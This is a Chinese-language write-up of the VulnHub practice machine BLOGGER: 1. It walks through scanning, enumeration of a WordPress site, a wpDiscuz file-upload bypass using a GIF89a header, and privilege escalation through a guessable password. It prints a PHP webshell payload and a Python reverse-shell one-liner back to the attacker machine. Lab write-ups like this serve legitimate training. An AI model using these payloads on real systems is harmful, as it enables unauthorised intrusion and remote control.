【靶机渗透】BLOGGER: 1
本篇将分享一个来源于VulnHub社区,适合初学者的靶机BLOGGER: 1
0x01靶机介绍
1. 详情
链接 | https://www.vulnhub.com/entry/blogger-1,675/ |
---|---|
发布日期 | 2021年4月4日 |
作者 | TheHackersBrain |
难度 | 初学者,简单 |
2. 描述
(一般VulnHub的靶机都有些情景模式,类似于游戏任务,增加趣味性、真实性)
James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style :)
一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。以机器人先生的风格破解你的方式:)
0x02环境搭建
1. 下载靶机
官网链接直接下载
觉得官网下载慢的朋友,可以后台回复 B1 获取资源
2. 创建靶机
下载好后直接将ova文件拖入VMware虚拟机即可,也可以使用VirtualBox 创建
等待导入完成
创建完成
3. 开启靶机
点击 ▶开启此虚拟机
0x03靶机渗透
攻击机使用Kali Linux (IP:192.168.64.133)
1. 主机发现
1 | arp-scan -l |
发现目标主机 192.168.64.140
2. 端口扫描
1 | masscan 192.168.64.140 --rate=10000 --ports 0-65535 |
仅识别2个开放的tcp端口22,80
3. 服务扫描
1 | nmap -T4 -sV -p22,80 -O 192.168.64.140 |
-sV
服务版本 -T4
速度(最高为5,推荐用4) -O
系统 -p
指定端口
22是ssh
,80是Apache http
服务
到现在有两个思路
- ssh爆破
- web漏洞入侵
先进行web信息收集
4. web信息收集
(添加Hosts的话可直接访问http://blogger.thm/)
主页上没有可以利用的地方,登录处会跳转到主页
接下来进行目录扫描,看能否找到可利用信息,用的工具是kali自带的dirb目录扫描工具,这里使用默认字典
1 | dirb http://192.168.64.140/ |
目录遍历漏洞,看看有没有可以利用的地方
在/assets/fonts
发现 blog/
文件夹
点开后发现是一个wordpress的站点
再用wpscan工具扫描该站点是否存在漏洞
1 | wpscan --url http://blogger.thm/assets/fonts/blog/ |
可能是wpscan api的原因,并未扫到什么
在网站文章评论处发现好像是WordPress评论插件wpDiscuz,F12查看源码验证,果真是wpDiscuz
wpDiscuz插件有任意文件上传漏洞
0x04漏洞利用
1. 上传webshell
点击评论栏图片标签,上传phpinfo文件,用Burp抓包
wpDiscuz插件会使用mime_content_type
函数来获取MIME类型,但是该函数在获取MIME类型是通过文件的十六进制起始字节来判断,所以只要文件头符合图片类型即可绕过
加上GIF头,也可用图片马
1 | GIF89a<?php phpinfo();?> |
成功上传,并返回路径
1 | http:\/\/blogger.thm\/assets\/fonts\/blog\/wp-content\/uploads\/2021\/06\/phpinfo-1623687844.54.php |
访问phpinfo
接下来就是上传反弹shell
1 | GIF89asystem($_GET['cmd']); @ |
上传成功
2. 反弹shell
使用harkbar工具传递执行python反弹shell
1 | python3 -c 'import socket,subprocess,os; |
攻击机nc监听
反弹成功
3. 权限提升
通过以下命令获取一个标准shell
1 | python3 -c 'import pty; pty.spawn("/bin/bash")' |
花了点时间,猜解到vagrant的密码是vagrant
运行sudo -l
命令显示vagrant可以运行所有命令,可以直接切换到root用户
1 | sudo su |
4. 拿flag
falg1
在/home/james找到user.txt
文件,发现为base64编码
解码
1 | echo -n "ZmxhZ3tZMHVfRCFEXzE3IDopfQ==" | base64 -d |
得到flag1:flag{Y0u_D!D_17 :)}
falg2
在/root找到root.txt
文件
同理解码
得到flag2:flag{W311_D0n3_Y0u_P3n3tr4t3d_M3 :)}
0x05总结
这个靶机主要考察目录枚举、WP插件漏洞利用,文件上传姿势,反弹shell等内容,是一个不错的靶机,适合初级练习。在练习的过程中注意对以及靶机网卡,hosts文件的配置。
如果你想快速获取BLOGGER: 1靶机的资源,后台回复B1即可。